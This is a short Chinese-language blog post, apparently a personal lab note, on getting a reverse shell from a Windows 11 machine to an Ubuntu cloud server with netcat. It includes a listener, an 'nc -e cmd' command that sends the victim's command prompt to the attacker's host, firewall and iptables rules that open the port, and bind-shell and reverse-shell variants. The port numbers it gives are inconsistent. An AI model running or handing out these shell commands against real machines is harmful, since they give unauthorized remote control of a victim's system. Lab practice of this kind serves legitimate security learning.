×

shell脚本 网安

云服务器_反弹shell

a_lyx a_lyx 发表于2025-04-29 16:22:51 浏览100 评论0

抢沙发发表评论


使用云服务器(ubuntu)执行反弹shell的操作

云服务器初始配置默认端口开放情况为只开放22号端口和3389端口

nc命令:反弹shell 开放一个监听端口 7777号端口

nc -lvnp 7777

查看监听端口是否开放

netstat -tuln | grep 7897

此时端口开放会显示开放信息

被攻击机器(win11)执行nc命令将自己的cmd权限反弹到服务器上

 nc -e cmd <服务器ip> 7788

此时发现win11执行命令无法将shell反弹到服务器上

排查过程

win11可以ping通服务器,nmap扫描监听端口发现监听端口开放,云服务器上允许入栈安全规则已经将监听端口开放。 此时查看文章发现可能是ubuntu的默认防火墙ufw和iptables规则表阻止了数据的入栈,修改默认防火墙规则和iptables表规则和可以接收到反弹的数据回传。

sudo ufw allow <监听端口>/tcp
sudo iptables -A INPUT -p tcp --dport <监听端口> -j ACCEPT


反弹shell的正反连接的区别

正向连接: (被攻击方打开指定端口监听)

被  nc -e cmd -lvvp 7788

  nc 192.168.2.127 7788 


反向连接: (攻击方打开特定端口监听,被攻击方将权限给到攻击方)

被  nc -e cmd 192.168.2.1 7788

 nc -lvvp 7788

群贤毕至

访客